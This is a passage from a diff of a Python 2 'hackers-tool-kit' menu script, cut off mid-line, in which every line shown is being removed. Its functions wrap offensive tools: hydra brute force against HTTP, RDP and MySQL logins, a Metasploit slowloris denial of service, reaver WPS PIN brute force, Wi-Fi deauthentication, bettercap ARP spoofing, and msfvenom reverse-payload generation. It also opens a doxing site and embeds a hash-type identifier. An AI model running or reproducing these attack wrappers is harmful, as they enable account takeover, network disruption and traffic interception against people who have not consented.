os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -#-------------------# -#HYDRA AUTOMATED END# - - -#WORDLIST MAKER START# -#--------------------# -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -#------------------# -#WORDLIST MAKER END# - - -#LIST FILES START# -#----------------# -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" -#--------------# -#LIST FILES END# - - -#MONITOR MODE OFF START# -#----------------------# -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -#--------------------# -#MONITOR MODE OFF END# - - -#TURN ON VPN START# -#-----------------# -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -#---------------# -#TURN ON VPN END# - - -#TURN OFF VPN START# -#------------------# -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -#----------------# -#TURN OFF VPN END# - - -#SLOW LORIS DOS START# -#--------------------# -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') - os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) - os.system('echo "run\n" >> slowl.rc') - os.system('msfconsole -r slowl.rc') - os.system('rm -rf slowl.rc') -#------------------# -#SLOW LORIS DOS END# - - -#OPEN DOX WEBSITE START# -#----------------------# -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -#--------------------# -#OPEN DOX WEBSITE END# - - -#SCAN SPECIFIC NET START# -#-----------------------# -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -#---------------------# -#SCAN SPECIFIC NET END# - - -#DEFAULT WIFI PIN START# -#----------------------# -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -#--------------------# -#DEFAULT WIFI PIN END# - - -#WIFI PIN BRUTEFORCE START# -#-------------------------# -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -#-----------------------# -#WIFI PIN BRUTEFORCE END# - - -#DEAUTH ATTACK START# -#-------------------# -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -#-----------------# -#DEAUTH ATTACK END# - - -#MAC CHANGER START# -#-----------------# -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-----------------# -#MAC CHANGER START# - - -#MAC CHANGER OFF START# -#---------------------# -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-------------------# -#MAC CHANGER OFF END# - - -#ARP SPOOF START# -#---------------# -def arpspoof(): - print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" - h = raw_input("Targets: ") - os.system('echo "net.sniff on\n" >> arp.cap') - os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) - os.system('echo "arp.spoof on\n" >> arp.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet arp.cap") - os.system("rm arp.cap") -#-------------# -#ARP SPOOF END# - - -#SSL SCAN START# -#--------------# -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -#------------# -#SSL SCAN END# - - -#MAKE A PAYLOAD START# -#--------------------# -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - os.system("cat /root/hackers-tool-kit/tools/formats.txt") - s = raw_input("Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) - os.system(a) -#------------------# -#MAKE A PAYLOAD END# - - -#WORDLIST MAKER START# -#--------------------# -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -#------------------# -#WORDLIST MAKER END# - - -#INTERNET TRAFFIC START# -#----------------------# -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -#--------------------# -#INTERNET TRAFFIC END# - - -#RESET ACCOUNT PASSWORD START# -#----------------------------# -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -#--------------------------# -#RESET ACCOUNT PASSWORD END# - - -#RESET UNIX PASSWORD START# -#-------------------------# -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -#-----------------------# -#RESET UNIX PASSWORD END# - - -#FIND HASH TYPE START# -#--------------------# -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and 